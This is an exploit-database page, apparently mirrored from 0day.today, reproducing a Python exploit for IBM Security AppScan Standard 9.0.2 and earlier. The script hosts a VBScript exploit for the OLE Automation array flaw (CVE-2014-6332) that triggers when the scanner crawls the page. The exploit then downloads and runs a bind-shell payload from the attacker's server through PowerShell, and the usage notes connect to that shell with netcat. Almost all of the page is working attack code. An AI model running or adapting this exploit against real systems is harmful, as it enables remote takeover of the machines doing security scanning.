Lucene search

K

IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution Exploit

🗓️ 02 Jun 2015 00:00:00Reported by Naser FarhadiType 
zdt
 zdt
🔗 0day.today👁 52 Views

IBM Security AppScan Standard <= 9.0.2 OLE Automation Array Remote Code Execution Exploit. This Python script exploits a vulnerability in IBM Security AppScan Standard <= 9.0.2, allowing remote code execution

Show more
Related
Code
#!/usr/bin/python
 
import BaseHTTPServer, socket
 
##
# IBM Security AppScan Standard OLE Automation Array Remote Code Execution
#
# Author: Naser Farhadi
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
#
# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
#
# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ 
# if you able to exploit IE then you can exploit appscan and acunetix ;)
# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And
# Metasploit windows/shell_bind_tcp Executable Payload
#
# Usage:
#       chmod +x appscan.py
#       ./appscan.py
#       ...
#       nc 172.20.10.14 333
#
# Video: http://youtu.be/hPs1zQaBLMU
##
 
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(req):
        req.send_response(200)
        if req.path == "/payload.exe":
            req.send_header('Content-type', 'application/exe')
            req.end_headers()
            exe = open("payload.exe", 'rb')
            req.wfile.write(exe.read())
            exe.close()
        else:
            req.send_header('Content-type', 'text/html')
            req.end_headers()
            req.wfile.write("""Please scan me!
                            <SCRIPT LANGUAGE="VBScript">
                            function runmumaa() 
                            On Error Resume Next
                            set shell=createobject("Shell.Application")
                            command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\
                            'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');"
                            shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
                            end function
 
                            dim   aa()
                            dim   ab()
                            dim   a0
                            dim   a1
                            dim   a2
                            dim   a3
                            dim   win9x
                            dim   intVersion
                            dim   rnda
                            dim   funclass
                            dim   myarray
 
                            Begin()
 
                            function Begin()
                              On Error Resume Next
                              info=Navigator.UserAgent
 
                              if(instr(info,"Win64")>0)   then
                                 exit   function
                              end if
 
                              if (instr(info,"MSIE")>0)   then 
                                         intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
                              else
                                 exit   function  
                                          
                              end if
 
                              win9x=0
 
                              BeginInit()
                              If Create()=True Then
                                 myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
                                 myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
 
                                 if(intVersion<4) then
                                     document.write("<br> IE")
                                     document.write(intVersion)
                                     runshellcode()                    
                                 else  
                                      setnotsafemode()
                                 end if
                              end if
                            end function
 
                            function BeginInit()
                               Randomize()
                               redim aa(5)
                               redim ab(5)
                               a0=13+17*rnd(6)
                               a3=7+3*rnd(5)
                            end function
 
                            function Create()
                              On Error Resume Next
                              dim i
                              Create=False
                              For i = 0 To 400
                                If Over()=True Then
                                '   document.write(i)     
                                   Create=True
                                   Exit For
                                End If 
                              Next
                            end function
 
                            sub testaa()
                            end sub
 
                            function mydata()
                                On Error Resume Next
                                 i=testaa
                                 i=null
                                 redim  Preserve aa(a2)  
                               
                                 ab(0)=0
                                 aa(a1)=i
                                 ab(0)=6.36598737437801E-314
 
                                 aa(a1+2)=myarray
                                 ab(2)=1.74088534731324E-310  
                                 mydata=aa(a1)
                                 redim  Preserve aa(a0)  
                            end function 
 
 
                            function setnotsafemode()
                                On Error Resume Next
                                i=mydata()  
                                i=readmemo(i+8)
                                i=readmemo(i+16)
                                j=readmemo(i+&h134)  
                                for k=0 to &h60 step 4
                                    j=readmemo(i+&h120+k)
                                    if(j=14) then
                                          j=0          
                                          redim  Preserve aa(a2)             
                                 aa(a1+2)(i+&h11c+k)=ab(4)
                                          redim  Preserve aa(a0)  
 
                                 j=0 
                                          j=readmemo(i+&h120+k)   
                                      
                                           Exit for
                                       end if
 
                                next 
                                ab(2)=1.69759663316747E-313
                                runmumaa() 
                            end function
 
                            function Over()
                                On Error Resume Next
                                dim type1,type2,type3
                                Over=False
                                a0=a0+a3
                                a1=a0+2
                                a2=a0+&h8000000
                               
                                redim  Preserve aa(a0) 
                                redim   ab(a0)     
                               
                                redim  Preserve aa(a2)
                               
                                type1=1
                                ab(0)=1.123456789012345678901234567890
                                aa(a0)=10
                                       
                                If(IsObject(aa(a1-1)) = False) Then
                                   if(intVersion<4) then
                                       mem=cint(a0+1)*16             
                                       j=vartype(aa(a1-1))
                                       if((j=mem+4) or (j*8=mem+8)) then
                                          if(vartype(aa(a1-1))<>0)  Then    
                                             If(IsObject(aa(a1)) = False ) Then             
                                               type1=VarType(aa(a1))
                                             end if               
                                          end if
                                       else
                                         redim  Preserve aa(a0)
                                         exit  function
 
                                       end if 
                                    else
                                       if(vartype(aa(a1-1))<>0)  Then    
                                          If(IsObject(aa(a1)) = False ) Then
                                              type1=VarType(aa(a1))
                                          end if               
                                        end if
                                    end if
                                end if
                                           
                                 
                                If(type1=&h2f66) Then         
                                      Over=True      
                                End If  
                                If(type1=&hB9AD) Then
                                      Over=True
                                      win9x=1
                                End If  
 
                                redim  Preserve aa(a0)          
                                     
                            end function
 
                            function ReadMemo(add) 
                                On Error Resume Next
                                redim  Preserve aa(a2)  
                               
                                ab(0)=0   
                                aa(a1)=add+4     
                                ab(0)=1.69759663316747E-313       
                                ReadMemo=lenb(aa(a1))  
                                
                                ab(0)=0    
                              
                                redim  Preserve aa(a0)
                            end function
 
                            </script>""")
 
if __name__ == '__main__':
    sclass = BaseHTTPServer.HTTPServer
    server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
    print "Http server started", socket.gethostbyname(socket.gethostname()), 80
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass
    server.server_close()

#  0day.today [2018-04-01]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Jun 2015 00:00Current
7.9High risk
Vulners AI Score7.9
EPSS0.973
52
.json
Report